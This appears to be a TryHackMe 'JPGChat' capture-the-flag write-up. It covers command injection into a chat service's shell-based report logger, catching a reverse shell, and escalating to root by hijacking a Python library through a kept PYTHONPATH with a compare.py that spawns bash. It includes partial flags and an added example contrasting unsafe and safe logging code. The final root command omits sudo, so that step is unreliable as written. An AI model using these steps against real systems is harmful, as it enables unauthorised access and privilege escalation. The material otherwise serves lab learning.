Tryhackme JPGChat Writeup

Let’s start with an nmap scan.
Command: nmap -vv -sCV 10.10.103.19
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
3000/tcp open tcpwrapped syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s connect to port 3000 with netcat.
Command: nc 10.10.103.19 3000

The banner says the source code is in the admin account on GitHub.


When we look at the file named “jpchat.py”, we see that it writes our input to a file by passing it to the shell “echo” command.
We can inject a command here.
Command: echo test;whoami; > a.txt
Now we can inject our command by choosing the “[REPORT]” option on port 3000, the service we connected to with netcat.
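To show what the fix looks like, here is an added example (my own code, not the room’s jpchat.py) that contrasts a constructed version of the echo-based logger with two safe writers; the function and file names are assumptions.

```python
import os
import shlex
import subprocess
import tempfile


# Constructed illustration of the bug pattern described above (report text spliced
# into a shell "echo" command). Not the room's jpchat.py; only the shape is reproduced.
def log_report_unsafe(report: str, path: str) -> None:
    # Shown for contrast only: the report string becomes part of a /bin/sh command
    # line, so ';', '|', '$(...)' and '>' inside it are interpreted, not stored.
    os.system("echo " + report + " >> " + path)


def log_report_safe(report: str, path: str) -> None:
    # Preferred fix: no shell at all. The text is written exactly as received.
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(report.replace("\n", " ") + "\n")


def log_report_quoted(report: str, path: str) -> None:
    # If a shell is unavoidable, quote every untrusted value and keep the command fixed.
    cmd = "echo " + shlex.quote(report) + " >> " + shlex.quote(path)
    subprocess.run(cmd, shell=True, check=True)


def stored_line(writer, report: str) -> str:
    """Run `writer` on a throwaway file and return what actually landed on disk."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "reports.txt")
        writer(report, path)
        with open(path, encoding="utf-8") as fh:
            return fh.read()


if __name__ == "__main__":
    sample = "test;whoami"  # constructed input mirroring the probe used in the writeup
    # Both safe writers keep the semicolon as plain text; nothing is executed.
    print(repr(stored_line(log_report_safe, sample)))
    print(repr(stored_line(log_report_quoted, sample)))
```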

With netcat listening on our machine, we can catch a reverse shell.
Command: nc -lvp 4444
listening on [any] 4444 ...
10.10.252.148: inverse host lookup failed: Unknown host
connect to [10.9.45.10] from (UNKNOWN) [10.10.252.148] 45586
bash: cannot set terminal process group (1022): Inappropriate ioctl for device
bash: no job control in this shell
wes@ubuntu-xenial:/$
We spawn a pty with Python and export TERM=xterm.
Command: python -c 'import pty;pty.spawn("/bin/bash")'
Command: export TERM=xterm
We can get our first flag, “user.txt”, from our home directory.
JPC{48703041**************6178318}
Now let’s root the box.
Command: sudo -l
Matching Defaults entries for wes on ubuntu-xenial:
    mail_badpass, env_keep+=PYTHONPATH
User wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
Let’s read the Python file in /opt.
Command: cat /opt/development/test_module.py
#!/usr/bin/env python3
from compare import *
print(compare.Str('hello', 'hello', 'hello'))
Here we can use the “Python library hijacking” method: sudo keeps PYTHONPATH (env_keep) and the script imports compare, so a compare.py of our own placed on that path is loaded instead of the real module.
Command: echo 'import os;os.system("/bin/bash")' > compare.py
Command: export PYTHONPATH=/home/wes/
Now we can run the Python script.
Command: /usr/bin/python3 /opt/development/test_module.py
Yeah, we are root now.
Command: cd /root/ && cat root.txt
JPC{665b7f2e******************0b081b0a}
Thank you for reading and solving.